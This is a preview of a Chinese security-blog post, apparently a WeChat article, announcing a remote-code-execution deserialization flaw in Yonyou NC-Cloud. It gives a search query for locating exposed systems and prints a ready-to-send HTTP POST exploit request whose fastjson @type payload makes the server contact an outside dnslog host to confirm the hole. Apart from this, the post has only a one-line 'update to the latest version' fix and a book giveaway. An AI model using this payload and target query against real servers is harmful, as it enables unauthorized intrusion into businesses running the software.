专栏名称: 渗透Xiao白帽
早起的鸟儿有虫吃!相互学习分享涨知识。会不定期分享一些网络安全相关内容.
今天看啥  ›  专栏  ›  渗透Xiao白帽

福利送书 | 1day-用友NC-Cloud RCE漏洞(附EXP)

渗透Xiao白帽  · 公众号  ·  · 2024-07-31 11:33

文章预览

高级内网域渗透实战思路+武器化研究技术分享视频 录播观看 地址 https://www.bilibili.com/video/BV17WvNexE6t/?vd_source=968431fb69493dc946362b62f2c6b094 0x01 前言       用友NC Cloud存在反序列化漏洞 。 攻击者可以利用此漏洞执行任意命令 , 通过该漏洞可以获取服务器权限 。 0x02 影响平台 NC-Cloud 0x03 漏洞复现 搜索语法 app = "用友-NC-Cloud" EXP如下: POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1 Host : ip:port User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36 Content-Type : application/json Content-Length : 113 { "clientParam" : "{\" x\ ":{\" @type\ ":\" java.net.InetSocketAddress\ "{\" address\ ":,\" val\ ":\" p76bl0.dnslog.cn\ "}}}" } Suc c e ss~ 0x04 修复方案 建议及时更新至最新版本! 福利抽奖 一:Windows黑客编程技术详解          近年来,全球大规模爆发勒索 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览